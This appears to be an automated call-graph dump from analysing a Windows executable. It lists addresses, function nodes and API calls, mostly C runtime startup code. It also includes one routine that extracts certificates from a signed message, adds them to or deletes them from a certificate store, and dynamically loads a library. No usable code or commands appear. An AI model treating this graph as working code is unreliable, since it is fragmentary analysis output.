6009 aca130 __startOneArgErrorHandling 6006->6009 6011 aca472 6006->6011 6008 aca786 __startOneArgErrorHandling 15 API calls 6010 aca166 _ValidateLocalCookies 6008->6010 6009->6008 6009->6010 6010->6004 6012 aca495 __raise_exc RaiseException 6011->6012 6013 aca490 6012->6013 6013->6009 6164 ac383f 6165 ac384b ___scrt_is_nonwritable_in_current_image 6164->6165 6166 ac3882 _abort 6165->6166 6172 ac56e2 EnterCriticalSection 6165->6172 6168 ac385f 6169 ac67cb __fassign 15 API calls 6168->6169 6170 ac386f 6169->6170 6173 ac3888 6170->6173 6172->6168 6176 ac572a LeaveCriticalSection 6173->6176 6175 ac388f 6175->6166 6176->6175 5767 ac1ab8 5768 ac1aef 5767->5768 5769 ac1aca 5767->5769 5769->5768 5776 ac209a 5769->5776 5788 ac23c3 5776->5788 5779 ac20a3 5780 ac23c3 43 API calls 5779->5780 5781 ac1b06 5780->5781 5782 ac3e89 5781->5782 5783 ac3e95 _abort 5782->5783 5784 ac4424 _abort 33 API calls 5783->5784 5787 ac3e9a 5784->5787 5785 ac3f24 _abort 33 API calls 5786 ac3ec4 5785->5786 5787->5785 5802 ac23d1 5788->5802 5790 ac23c8 5791 ac1afc 5790->5791 5792 ac6b14 _abort 2 API calls 5790->5792 5791->5779 5793 ac3f29 5792->5793 5794 ac3f35 5793->5794 5795 ac6b6f _abort 33 API calls 5793->5795 5796 ac3f3e IsProcessorFeaturePresent 5794->5796 5801 ac3f5c 5794->5801 5795->5794 5798 ac3f49 5796->5798 5797 ac3793 _abort 23 API calls 5799 ac3f66 5797->5799 5800 ac4573 _abort 3 API calls 5798->5800 5800->5801 5801->5797 5803 ac23dd GetLastError 5802->5803 5804 ac23da 5802->5804 5814 ac26a4 5803->5814 5804->5790 5807 ac2457 SetLastError 5807->5790 5808 ac26df ___vcrt_FlsSetValue 6 API calls 5809 ac240b 5808->5809 5810 ac2433 5809->5810 5811 ac26df ___vcrt_FlsSetValue 6 API calls 5809->5811 5813 ac2411 5809->5813 5812 ac26df ___vcrt_FlsSetValue 6 API calls 5810->5812 5810->5813 5811->5810 5812->5813 5813->5807 5815 ac2543 ___vcrt_FlsFree 5 API calls 5814->5815 5816 ac26be 5815->5816 5817 ac26d6 TlsGetValue 5816->5817 5818 ac23f2 5816->5818 5817->5818 5818->5807 5818->5808 5818->5813 5819 ac48bb 5820 ac48cb 5819->5820 5821 ac48e1 5819->5821 5822 ac47f9 _free 15 API calls 5820->5822 5831 ac4a2c 5821->5831 5833 ac494b 5821->5833 5838 ac4a4b 5821->5838 5823 ac48d0 5822->5823 5825 ac473d _abort 21 API calls 5823->5825 5826 ac48da 5825->5826 5828 ac49b9 5830 ac4869 _free 15 API calls 5828->5830 5829 ac49b0 5829->5828 5835 ac4a3e 5829->5835 5855 ac79bb 5829->5855 5830->5831 5864 ac4c65 5831->5864 5849 ac31ec 5833->5849 5836 ac474d _abort 6 API calls 5835->5836 5837 ac4a4a 5836->5837 5839 ac4a57 5838->5839 5839->5839 5840 ac480c _abort 15 API calls 5839->5840 5841 ac4a85 5840->5841 5842 ac79bb 21 API calls 5841->5842 5843 ac4ab1 5842->5843 5844 ac474d _abort 6 API calls 5843->5844 5845 ac4ae0 _abort 5844->5845 5846 ac4b81 FindFirstFileExA 5845->5846 5847 ac4bd0 5846->5847 5848 ac4a4b 21 API calls 5847->5848 5850 ac31fd 5849->5850 5851 ac3201 5849->5851 5850->5829 5851->5850 5852 ac480c _abort 15 API calls 5851->5852 5853 ac322f 5852->5853 5854 ac4869 _free 15 API calls 5853->5854 5854->5850 5857 ac790a 5855->5857 5856 ac791f 5858 ac47f9 _free 15 API calls 5856->5858 5859 ac7924 5856->5859 5857->5856 5857->5859 5862 ac795b 5857->5862 5860 ac794a 5858->5860 5859->5829 5861 ac473d _abort 21 API calls 5860->5861 5861->5859 5862->5859 5863 ac47f9 _free 15 API calls 5862->5863 5863->5860 5865 ac4c6f 5864->5865 5866 ac4c7f 5865->5866 5867 ac4869 _free 15 API calls 5865->5867 5868 ac4869 _free 15 API calls 5866->5868 5867->5865 5869 ac4c86 5868->5869 5869->5826 5870 ac14bb IsProcessorFeaturePresent 5871 ac14d0 5870->5871 5874 ac1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5871->5874 5873 ac15b3 5874->5873 6014 ac12fb 6019 ac1aac SetUnhandledExceptionFilter 6014->6019 6016 ac1300 6020 ac38f9 6016->6020 6018 ac130b 6019->6016 6021 ac391f 6020->6021 6022 ac3905 6020->6022 6021->6018 6022->6021 6023 ac47f9 _free 15 API calls 6022->6023 6024 ac390f 6023->6024 6025 ac473d _abort 21 API calls 6024->6025 6026 ac391a 6025->6026 6026->6018 6027 ac1ff4 6030 ac2042 6027->6030 6031 ac1fff 6030->6031 6032 ac204b 6030->6032 6032->6031 6033 ac23c3 43 API calls 6032->6033 6034 ac2086 6033->6034 6035 ac23c3 43 API calls 6034->6035 6036 ac2091 6035->6036 6037 ac3e89 33 API calls 6036->6037 6038 ac2099 6037->6038 5875 ac3eb5 5876 ac3eb8 5875->5876 5877 ac3f24 _abort 33 API calls 5876->5877 5878 ac3ec4 5877->5878 6598 ac7570 6599 ac75a9 6598->6599 6600 ac47f9 _free 15 API calls 6599->6600 6604 ac75d5 _ValidateLocalCookies 6599->6604 6601 ac75b2 6600->6601 6602 ac473d _abort 21 API calls 6601->6602 6603 ac75bd _ValidateLocalCookies 6602->6603 6039 ac8df1 6040 ac8e15 6039->6040 6041 ac8e2e 6040->6041 6043 ac9beb __startOneArgErrorHandling 6040->6043 6042 ac8e78 6041->6042 6047 ac99d3 6041->6047 6045 aca1c4 16 API calls 6043->6045 6046 ac9c2d __startOneArgErrorHandling 6043->6046 6045->6046 6048 ac99f0 DecodePointer 6047->6048 6049 ac9a00 6047->6049 6048->6049 6050 ac9a8d 6049->6050 6051 ac9a82 _ValidateLocalCookies 6049->6051 6053 ac9a37 6049->6053 6050->6051 6052 ac47f9 _free 15 API calls 6050->6052 6051->6042 6052->6051 6053->6051 6054 ac47f9 _free 15 API calls 6053->6054 6054->6051 5032 ac130d 5033 ac1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 ac162b 5033->5060 5035 ac1320 5036 ac1473 5035->5036 5046 ac134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5046 5112 ac191f IsProcessorFeaturePresent 5036->5112 5038 ac147a 5039 ac1480 5038->5039 5116 ac37e1 5038->5116 5119 ac3793 5039->5119 5043 ac1369 5044 ac13ea 5068 ac1a34 5044->5068 5046->5043 5046->5044 5097 ac37a9 5046->5097 5052 ac1405 5103 ac1a6a GetModuleHandleW 5052->5103 5055 ac1410 5056 ac1419 5055->5056 5105 ac3784 5055->5105 5108 ac179c 5056->5108 5061 ac1634 5060->5061 5122 ac1bd4 IsProcessorFeaturePresent 5061->5122 5065 ac1645 5066 ac1649 5065->5066 5132 ac1f7d 5065->5132 5066->5035 5192 ac20b0 5068->5192 5071 ac13f0 5072 ac3457 5071->5072 5194 ac522b 5072->5194 5074 ac3460 5075 ac13f8 5074->5075 5198 ac55b6 5074->5198 5077 ac1000 6 API calls 5075->5077 5078 ac1096 CryptMsgGetParam 5077->5078 5079 ac11e3 Sleep 5077->5079 5080 ac10bc LocalAlloc 5078->5080 5081 ac1162 CryptMsgGetParam 5078->5081 5082 ac1215 CertCloseStore LocalFree LocalFree LocalFree 5079->5082 5083 ac11f7 5079->5083 5084 ac1156 LocalFree 5080->5084 5085 ac10d7 5080->5085 5081->5079 5086 ac1174 CryptMsgGetParam 5081->5086 5082->5052 5083->5082 5088 ac120a CertDeleteCertificateFromStore 5083->5088 5084->5081 5087 ac10e0 LocalAlloc CryptMsgGetParam 5085->5087 5086->5079 5089 ac1188 CertFindAttribute CertFindAttribute 5086->5089 5090 ac113d LocalFree 5087->5090 5091 ac1114 CertCreateCertificateContext 5087->5091 5088->5083 5092 ac11b5 LoadLibraryA GetProcAddress 5089->5092 5093 ac11b1 5089->5093 5090->5087 5096 ac114d 5090->5096 5094 ac1126 CertAddCertificateContextToStore 5091->5094 5095 ac1133 CertFreeCertificateContext 5091->5095 5092->5079 5093->5079 5093->5092 5094->5095 5095->5090 5096->5084 5098 ac37d1 _abort 5097->5098 5098->5044 5099 ac4424 _abort 33 API calls 5098->5099 5102 ac3e9a 5099->5102 5100 ac3f24 _abort 33 API calls 5101 ac3ec4 5100->5101 5102->5100 5104 ac140c 5103->5104 5104->5038 5104->5055 5686 ac355e 5105->5686 5107 ac378f 5107->5056 5110 ac17a8 ___scrt_uninitialize_crt 5108->5110 5109 ac1421 5109->5043 5110->5109 5111 ac1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 ac1935 _abort 5112->5113 5114 ac19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 ac1a24 _abort 5114->5115 5115->5038 5117 ac355e _abort 23 API calls 5116->5117 5118 ac37f2 5117->5118 5118->5039 5120 ac355e _abort 23 API calls 5119->5120 5121 ac1488 5120->5121 5123 ac1640 5122->5123 5124 ac1f5e 5123->5124 5138 ac24b1 5124->5138 5128 ac1f7a 5128->5065 5129 ac1f6f 5129->5128 5152 ac24ed 5129->5152 5131 ac1f67 5131->5065 5133 ac1f86 5132->5133 5134 ac1f90 5132->5134 5135 ac2496 ___vcrt_uninitialize_ptd 6 API calls 5133->5135 5134->5066 5136 ac1f8b 5135->5136 5137 ac24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5134 5139 ac24ba 5138->5139 5141 ac24e3 5139->5141 5143 ac1f63 5139->5143 5156 ac271d 5139->5156 5142 ac24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5142 5142->5143 5143->5131 5144 ac2463 5143->5144 5173 ac262e 5144->5173 5147 ac2478 5147->5129 5150 ac2493 5150->5129 5153 ac24f8 5152->5153 5155 ac2517 5152->5155 5154 ac2502 DeleteCriticalSection 5153->5154 5154->5154 5154->5155 5155->5131 5161 ac2543 5156->5161 5159 ac2755 InitializeCriticalSectionAndSpinCount 5160 ac2740 5159->5160 5160->5139 5162 ac2560 5161->5162 5165 ac2564 5161->5165 5162->5159 5162->5160 5164 ac25cc GetProcAddress 5164->5162 5165->5162 5165->5164 5166 ac25bd 5165->5166 5168 ac25e3 LoadLibraryExW 5165->5168 5166->5164 5167 ac25c5 FreeLibrary 5166->5167 5167->5164 5169 ac262a 5168->5169 5170 ac25fa GetLastError 5168->5170 5169->5165 5170->5169 5171 ac2605 ___vcrt_FlsFree 5170->5171 5171->5169 5172 ac261b LoadLibraryExW 5171->5172 5172->5165 5174 ac2543 ___vcrt_FlsFree 5 API calls 5173->5174 5175 ac2648 5174->5175 5176 ac2661 TlsAlloc 5175->5176 5177 ac246d 5175->5177 5177->5147 5178 ac26df 5177->5178 5179 ac2543 ___vcrt_FlsFree 5 API calls 5178->5179 5180 ac26f9 5179->5180 5181 ac2714 TlsSetValue 5180->5181 5182 ac2486 5180->5182 5181->5182 5182->5150 5183 ac2496 5182->5183 5184 ac24a6 5183->5184 5185 ac24a0 5183->5185 5184->5147 5187 ac2669 5185->5187 5188 ac2543 ___vcrt_FlsFree 5 API calls 5187->5188 5189 ac2683 5188->5189 5190 ac269b TlsFree 5189->5190 5191 ac268f 5189->5191 5190->5191 5191->5184 5193 ac1a47 GetStartupInfoW 5192->5193 5193->5071 5195 ac5234 5194->5195 5196 ac523d 5194->5196 5201 ac512a 5195->5201 5196->5074 5683 ac555d 5198->5683 5221 ac4424 GetLastError 5201->5221 5203 ac5137 5241 ac5249 5203->5241 5205 ac513f 5250 ac4ebe 5205->5250 5208 ac5156 5208->5196 5211 ac5199 5275 ac4869 5211->5275 5214 ac518c 5215 ac5194 5214->5215 5218 ac51b1 5214->5218 5272 ac47f9 5215->5272 5217 ac51dd 5217->5211 5281 ac4d94 5217->5281 5218->5217 5219 ac4869 _free 15 API calls 5218->5219 5219->5217 5222 ac443a 5221->5222 5223 ac4440 5221->5223 5284 ac5904 5222->5284 5227 ac448f SetLastError 5223->5227 5289 ac480c 5223->5289 5227->5203 5228 ac445a 5231 ac4869 _free 15 API calls 5228->5231 5230 ac446f 5230->5228 5232 ac4476 5230->5232 5233 ac4460 5231->5233 5301 ac4296 5232->5301 5234 ac449b SetLastError 5233->5234 5306 ac3f24 5234->5306 5238 ac4869 _free 15 API calls 5240 ac4488 5238->5240 5240->5227 5240->5234 5242 ac5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 ac4424 _abort 33 API calls 5242->5243 5245 ac525f 5243->5245 5246 ac52e3 _abort 5245->5246 5248 ac3f24 _abort 33 API calls 5245->5248 5249 ac4869 _free 15 API calls 5245->5249 5542 ac56e2 EnterCriticalSection 5245->5542 5543 ac52da 5245->5543 5246->5205 5248->5245 5249->5245 5547 ac3f72 5250->5547 5253 ac4edf GetOEMCP 5255 ac4f08 5253->5255 5254 ac4ef1 5254->5255 5256 ac4ef6 GetACP 5254->5256 5255->5208 5257 ac62ff 5255->5257 5256->5255 5258 ac633d 5257->5258 5262 ac630d _abort 5257->5262 5259 ac47f9 _free 15 API calls 5258->5259 5261 ac5167 5259->5261 5260 ac6328 HeapAlloc 5260->5261 5260->5262 5261->5211 5264 ac52eb 5261->5264 5262->5258 5262->5260 5263 ac6992 _abort 2 API calls 5262->5263 5263->5262 5265 ac4ebe 35 API calls 5264->5265 5267 ac530a 5265->5267 5266 ac5311 _ValidateLocalCookies 5266->5214 5267->5266 5268 ac535b IsValidCodePage 5267->5268 5271 ac5380 _abort 5267->5271 5268->5266 5269 ac536d GetCPInfo 5268->5269 5269->5266 5269->5271 5584 ac4f96 GetCPInfo 5271->5584 5273 ac44a8 _abort 15 API calls 5272->5273 5274 ac47fe 5273->5274 5274->5211 5276 ac4874 HeapFree 5275->5276 5280 ac489d _free 5275->5280 5277 ac4889 5276->5277 5276->5280 5278 ac47f9 _free 13 API calls 5277->5278 5279 ac488f GetLastError 5278->5279 5279->5280 5280->5208 5647 ac4d51 5281->5647 5283 ac4db8 5283->5211 5317 ac5741 5284->5317 5286 ac592b 5287 ac5943 TlsGetValue 5286->5287 5288 ac5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5294 ac4819 _abort 5289->5294 5290 ac4859 5292 ac47f9 _free 14 API calls 5290->5292 5291 ac4844 HeapAlloc 5293 ac4452 5291->5293 5291->5294 5292->5293 5293->5228 5296 ac595a 5293->5296 5294->5290 5294->5291 5330 ac6992 5294->5330 5297 ac5741 _abort 5 API calls 5296->5297 5298 ac5981 5297->5298 5299 ac599c TlsSetValue 5298->5299 5300 ac5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5230 5344 ac426e 5301->5344 5452 ac6b14 5306->5452 5309 ac3f35 5311 ac3f3e IsProcessorFeaturePresent 5309->5311 5316 ac3f5c 5309->5316 5313 ac3f49 5311->5313 5312 ac3793 _abort 23 API calls 5314 ac3f66 5312->5314 5480 ac4573 5313->5480 5316->5312 5321 ac576d 5317->5321 5322 ac5771 _abort 5317->5322 5318 ac5791 5320 ac579d GetProcAddress 5318->5320 5318->5322 5320->5322 5321->5318 5321->5322 5323 ac57dd 5321->5323 5322->5286 5324 ac57fe LoadLibraryExW 5323->5324 5329 ac57f3 5323->5329 5325 ac581b GetLastError 5324->5325 5326 ac5833 5324->5326 5325->5326 5327 ac5826 LoadLibraryExW 5325->5327 5328 ac584a FreeLibrary 5326->5328 5326->5329 5327->5326 5328->5329 5329->5321 5333 ac69d6 5330->5333 5332 ac69a8 _ValidateLocalCookies 5332->5294 5334 ac69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 ac56e2 EnterCriticalSection 5334->5339 5336 ac69ed 5340 ac6a1f 5336->5340 5338 ac6a14 _abort 5338->5332 5339->5336 5343 ac572a LeaveCriticalSection 5340->5343 5342 ac6a26 5342->5338 5343->5342 5350 ac41ae 5344->5350 5346 ac4292 5347 ac421e 5346->5347 5361 ac40b2 5347->5361 5349 ac4242 5349->5238 5351 ac41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 ac56e2 EnterCriticalSection 5351->5356 5353 ac41c4 5357 ac41ea 5353->5357 5355 ac41e2 _abort 5355->5346 5356->5353 5360 ac572a LeaveCriticalSection 5357->5360 5359 ac41f4 5359->5355 5360->5359 5362 ac40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 ac56e2 EnterCriticalSection 5362->5369 5364 ac40c8 5370 ac43d9 5364->5370 5366 ac40e0 5374 ac40f6 5366->5374 5368 ac40ee _abort 5368->5349 5369->5364 5371 ac440f __fassign 5370->5371 5372 ac43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 ac6507 5372->5377 5451 ac572a LeaveCriticalSection 5374->5451 5376 ac4100 5376->5368 5378 ac651d 5377->5378 5380 ac6587 5377->5380 5378->5380 5382 ac6550 5378->5382 5387 ac4869 _free 15 API calls 5378->5387 5381 ac4869 _free 15 API calls 5380->5381 5404 ac65d5 5380->5404 5383 ac65a9 5381->5383 5384 ac6572 5382->5384 5392 ac4869 _free 15 API calls 5382->5392 5385 ac4869 _free 15 API calls 5383->5385 5386 ac4869 _free 15 API calls 5384->5386 5388 ac65bc 5385->5388 5389 ac657c 5386->5389 5391 ac6545 5387->5391 5393 ac4869 _free 15 API calls 5388->5393 5394 ac4869 _free 15 API calls 5389->5394 5390 ac6643 5395 ac4869 _free 15 API calls 5390->5395 5405 ac6078 5391->5405 5397 ac6567 5392->5397 5398 ac65ca 5393->5398 5394->5380 5400 ac6649 5395->5400 5433 ac6176 5397->5433 5402 ac4869 _free 15 API calls 5398->5402 5399 ac65e3 5399->5390 5403 ac4869 15 API calls _free 5399->5403 5400->5371 5402->5404 5403->5399 5445 ac667a 5404->5445 5406 ac6089 5405->5406 5432 ac6172 5405->5432 5407 ac609a 5406->5407 5408 ac4869 _free 15 API calls 5406->5408 5409 ac60ac 5407->5409 5410 ac4869 _free 15 API calls 5407->5410 5408->5407 5411 ac60be 5409->5411 5413 ac4869 _free 15 API calls 5409->5413 5410->5409 5412 ac60d0 5411->5412 5414 ac4869 _free 15 API calls 5411->5414 5415 ac60e2 5412->5415 5416 ac4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 ac4869 _free 15 API calls 5415->5417 5418 ac60f4 5415->5418 5416->5415 5417->5418 5420 ac6106 5418->5420 5421 ac4869 _free 15 API calls 5418->5421 5419 ac6118 5423 ac612a 5419->5423 5424 ac4869 _free 15 API calls 5419->5424 5420->5419 5422 ac4869 _free 15 API calls 5420->5422 5421->5420 5422->5419 5425 ac613c 5423->5425 5426 ac4869 _free 15 API calls 5423->5426 5424->5423 5427 ac614e 5425->5427 5429 ac4869 _free 15 API calls 5425->5429 5426->5425 5428 ac6160 5427->5428 5430 ac4869 _free 15 API calls 5427->5430 5431 ac4869 _free 15 API calls 5428->5431 5428->5432 5429->5427 5430->5428 5431->5432 5432->5382 5434 ac61db 5433->5434 5435 ac6183 5433->5435 5434->5384 5436 ac6193 5435->5436 5437 ac4869 _free 15 API calls 5435->5437 5438 ac61a5 5436->5438 5439 ac4869 _free 15 API calls 5436->5439 5437->5436 5440 ac61b7 5438->5440 5442 ac4869 _free 15 API calls 5438->5442 5439->5438 5441 ac61c9 5440->5441 5443 ac4869 _free 15 API calls 5440->5443 5441->5434 5444 ac4869 _free 15 API calls 5441->5444 5442->5440 5443->5441 5444->5434 5446 ac66a5 5445->5446 5447 ac6687 5445->5447 5446->5399 5447->5446 5448 ac621b __fassign 15 API calls 5447->5448 5449 ac669f 5448->5449 5450 ac4869 _free 15 API calls 5449->5450 5450->5446 5451->5376 5484 ac6a82 5452->5484 5455 ac6b6f 5456 ac6b7b _abort 5455->5456 5459 ac6ba2 _abort 5456->5459 5462 ac6ba8 _abort 5456->5462 5498 ac44a8 GetLastError 5456->5498 5458 ac6bf4 5460 ac47f9 _free 15 API calls 5458->5460 5459->5458 5459->5462 5464 ac6bd7 _abort 5459->5464 5461 ac6bf9 5460->5461 5517 ac473d 5461->5517 5468 ac6c20 5462->5468 5520 ac56e2 EnterCriticalSection 5462->5520 5464->5309 5467 ac6c77 5470 ac3793 _abort 23 API calls 5467->5470 5468->5467 5472 ac6c7f 5468->5472 5477 ac6caa 5468->5477 5521 ac572a LeaveCriticalSection 5468->5521 5470->5472 5472->5477 5522 ac6b66 5472->5522 5474 ac4424 _abort 33 API calls 5478 ac6d0d 5474->5478 5476 ac6b66 _abort 33 API calls 5476->5477 5525 ac6d2f 5477->5525 5478->5464 5479 ac4424 _abort 33 API calls 5478->5479 5479->5464 5481 ac458f _abort 5480->5481 5482 ac45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 ac468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 ac6a28 5484->5487 5486 ac3f29 5486->5309 5486->5455 5488 ac6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 ac56e2 EnterCriticalSection 5488->5493 5490 ac6a42 5494 ac6a76 5490->5494 5492 ac6a69 _abort 5492->5486 5493->5490 5497 ac572a LeaveCriticalSection 5494->5497 5496 ac6a80 5496->5492 5497->5496 5499 ac44c7 5498->5499 5500 ac44c1 5498->5500 5502 ac480c _abort 12 API calls 5499->5502 5504 ac451e SetLastError 5499->5504 5501 ac5904 _abort 6 API calls 5500->5501 5501->5499 5503 ac44d9 5502->5503 5505 ac44e1 5503->5505 5507 ac595a _abort 6 API calls 5503->5507 5506 ac4527 5504->5506 5508 ac4869 _free 12 API calls 5505->5508 5506->5459 5509 ac44f6 5507->5509 5510 ac44e7 5508->5510 5509->5505 5511 ac44fd 5509->5511 5513 ac4515 SetLastError 5510->5513 5512 ac4296 _abort 12 API calls 5511->5512 5514 ac4508 5512->5514 5513->5506 5515 ac4869 _free 12 API calls 5514->5515 5516 ac450e 5515->5516 5516->5504 5516->5513 5529 ac46c2 5517->5529 5519 ac4749 5519->5464 5520->5468 5521->5467 5523 ac4424 _abort 33 API calls 5522->5523 5524 ac6b6b 5523->5524 5524->5476 5526 ac6cfe 5525->5526 5527 ac6d35 5525->5527 5526->5464 5526->5474 5526->5478 5541 ac572a LeaveCriticalSection 5527->5541 5530 ac44a8 _abort 15 API calls 5529->5530 5531 ac46d8 5530->5531 5534 ac46e6 _ValidateLocalCookies 5531->5534 5537 ac474d IsProcessorFeaturePresent 5531->5537 5533 ac473c 5535 ac46c2 _abort 21 API calls 5533->5535 5534->5519 5536 ac4749 5535->5536 5536->5519 5538 ac4758 5537->5538 5539 ac4573 _abort 3 API calls 5538->5539 5540 ac476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5245 5546 ac572a LeaveCriticalSection 5543->5546 5545 ac52e1 5545->5245 5546->5545 5548 ac3f8f 5547->5548 5549 ac3f85 5547->5549 5548->5549 5550 ac4424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 ac3fb0 5550->5551 5555 ac72d1 5551->5555 5556 ac72e4 5555->5556 5558 ac3fc9 5555->5558 5556->5558 5563 ac6754 5556->5563 5559 ac72fe 5558->5559 5560 ac7326 5559->5560 5561 ac7311 5559->5561 5560->5549 5561->5560 5562 ac5249 __fassign 33 API calls 5561->5562 5562->5560 5564 ac6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 ac4424 _abort 33 API calls 5564->5565 5566 ac6769 5565->5566 5569 ac67b7 _abort 5566->5569 5575 ac56e2 EnterCriticalSection 5566->5575 5568 ac6787 5576 ac67cb 5568->5576 5569->5558 5574 ac3f24 _abort 33 API calls 5574->5569 5575->5568 5577 ac67d9 __fassign 5576->5577 5579 ac679b 5576->5579 5578 ac6507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 ac67ba 5579->5580 5583 ac572a LeaveCriticalSection 5580->5583 5582 ac67ae 5582->5569 5582->5574 5583->5582 5587 ac4fd0 5584->5587 5591 ac507a _ValidateLocalCookies 5584->5591 5586 ac5031 5604 ac7cd1 5586->5604 5592 ac634d 5587->5592 5590 ac7cd1 38 API calls 5590->5591 5591->5266 5593 ac3f72 __fassign 33 API calls 5592->5593 5594 ac636d MultiByteToWideChar 5593->5594 5596 ac63ab 5594->5596 5597 ac6443 _ValidateLocalCookies 5594->5597 5598 ac63cc _abort __alloca_probe_16 5596->5598 5599 ac62ff 16 API calls 5596->5599 5597->5586 5600 ac643d 5598->5600 5602 ac6411 MultiByteToWideChar 5598->5602 5599->5598 5609 ac646a 5600->5609 5602->5600 5603 ac642d GetStringTypeW 5602->5603 5603->5600 5605 ac3f72 __fassign 33 API calls 5604->5605 5606 ac7ce4 5605->5606 5613 ac7ab4 5606->5613 5608 ac5052 5608->5590 5610 ac6487 5609->5610 5611 ac6476 5609->5611 5610->5597 5611->5610 5612 ac4869 _free 15 API calls 5611->5612 5612->5610 5614 ac7acf 5613->5614 5615 ac7af5 MultiByteToWideChar 5614->5615 5616 ac7ca9 _ValidateLocalCookies 5615->5616 5617 ac7b1f 5615->5617 5616->5608 5618 ac62ff 16 API calls 5617->5618 5622 ac7b40 __alloca_probe_16 5617->5622 5618->5622 5619 ac7b89 MultiByteToWideChar 5620 ac7bf5 5619->5620 5621 ac7ba2 5619->5621 5624 ac646a __freea 15 API calls 5620->5624 5638 ac5a15 5621->5638 5622->5619 5622->5620 5624->5616 5625 ac7bb9 5625->5620 5626 ac7bcc 5625->5626 5627 ac7c04 5625->5627 5626->5620 5629 ac5a15 6 API calls 5626->5629 5628 ac62ff 16 API calls 5627->5628 5631 ac7c25 __alloca_probe_16 5627->5631 5628->5631 5629->5620 5630 ac7c9a 5633 ac646a __freea 15 API calls 5630->5633 5631->5630 5632 ac5a15 6 API calls 5631->5632 5634 ac7c79 5632->5634 5633->5620 5634->5630 5635 ac7c88 WideCharToMultiByte 5634->5635 5635->5630 5636 ac7cc8 5635->5636 5637 ac646a __freea 15 API calls 5636->5637 5637->5620 5639 ac5741 _abort 5 API calls 5638->5639 5640 ac5a3c 5639->5640 5641 ac5a45 _ValidateLocalCookies 5640->5641 5644 ac5a9d 5640->5644 5641->5625 5643 ac5a85 LCMapStringW 5643->5641 5645 ac5741 _abort 5 API calls 5644->5645 5646 ac5ac4 _ValidateLocalCookies 5645->5646 5646->5643 5648 ac4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 ac56e2 EnterCriticalSection 5648->5655 5650 ac4d67 5656 ac4dbc 5650->5656 5654 ac4d80 _abort 5654->5283 5655->5650 5668 ac54dc 5656->5668 5658 ac4e0a 5659 ac54dc 21 API calls 5658->5659 5660 ac4e26 5659->5660 5661 ac54dc 21 API calls 5660->5661 5662 ac4e44 5661->5662 5663 ac4d74 5662->5663 5664 ac4869 _free 15 API calls 5662->5664 5665 ac4d88 5663->5665 5664->5663 5682 ac572a LeaveCriticalSection 5665->5682 5667 ac4d92 5667->5654 5669 ac54ed 5668->5669 5678 ac54e9 5668->5678 5670 ac54f4 5669->5670 5671 ac5507 _abort 5669->5671 5672 ac47f9 _free 15 API calls 5670->5672 5675 ac553e 5671->5675 5676 ac5535 5671->5676 5671->5678 5673 ac54f9 5672->5673 5674 ac473d _abort 21 API calls 5673->5674 5674->5678 5675->5678 5679 ac47f9 _free 15 API calls 5675->5679 5677 ac47f9 _free 15 API calls 5676->5677 5680 ac553a 5677->5680 5678->5658 5679->5680 5681 ac473d _abort 21 API calls 5680->5681 5681->5678 5682->5667 5684 ac3f72 __fassign 33 API calls 5683->5684 5685 ac5571 5684->5685 5685->5074 5687 ac356a _abort 5686->5687 5688 ac3582 5687->5688 5701 ac36b8 GetModuleHandleW 5687->5701 5708 ac56e2 EnterCriticalSection 5688->5708 5694 ac358a 5699 ac35ff _abort 5694->5699 5709 ac3c97 5694->5709 5696 ac3671 _abort 5696->5107 5712 ac3668 5699->5712 5702 ac3576 5701->5702 5702->5688 5703 ac36fc GetModuleHandleExW 5702->5703 5704 ac3726 GetProcAddress 5703->5704 5707 ac373b 5703->5707 5704->5707 5705 ac374f FreeLibrary 5706 ac3758 _ValidateLocalCookies 5705->5706 5706->5688 5707->5705 5707->5706 5708->5694 5723 ac39d0 5709->5723 5743 ac572a LeaveCriticalSection 5712->5743 5714 ac3641 5714->5696 5715 ac3677 5714->5715 5744 ac5b1f 5715->5744 5717 ac3681 5718 ac36a5 5717->5718 5719 ac3685 GetPEB 5717->5719 5721 ac36fc _abort 3 API calls 5718->5721 5719->5718 5720 ac3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 ac36ad ExitProcess 5721->5722 5726 ac397f 5723->5726 5725 ac39f4 5725->5699 5727 ac398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 ac56e2 EnterCriticalSection 5727->5734 5729 ac3999 5735 ac3a20 5729->5735 5731 ac39a6 5739 ac39c4 5731->5739 5733 ac39b7 _abort 5733->5725 5734->5729 5736 ac3a48 5735->5736 5738 ac3a40 _ValidateLocalCookies 5735->5738 5737 ac4869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 ac572a LeaveCriticalSection 5739->5742 5741 ac39ce 5741->5733 5742->5741 5743->5714 5745 ac5b44 5744->5745 5747 ac5b3a _ValidateLocalCookies 5744->5747 5746 ac5741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6605 ac324d 6606 ac522b 46 API calls 6605->6606 6607 ac325f 6606->6607 6616 ac561e GetEnvironmentStringsW 6607->6616 6610 ac326a 6612 ac4869 _free 15 API calls 6610->6612 6613 ac329f 6612->6613 6614 ac3275 6615 ac4869 _free 15 API calls 6614->6615 6615->6610 6617 ac5635 6616->6617 6627 ac5688 6616->6627 6620 ac563b WideCharToMultiByte 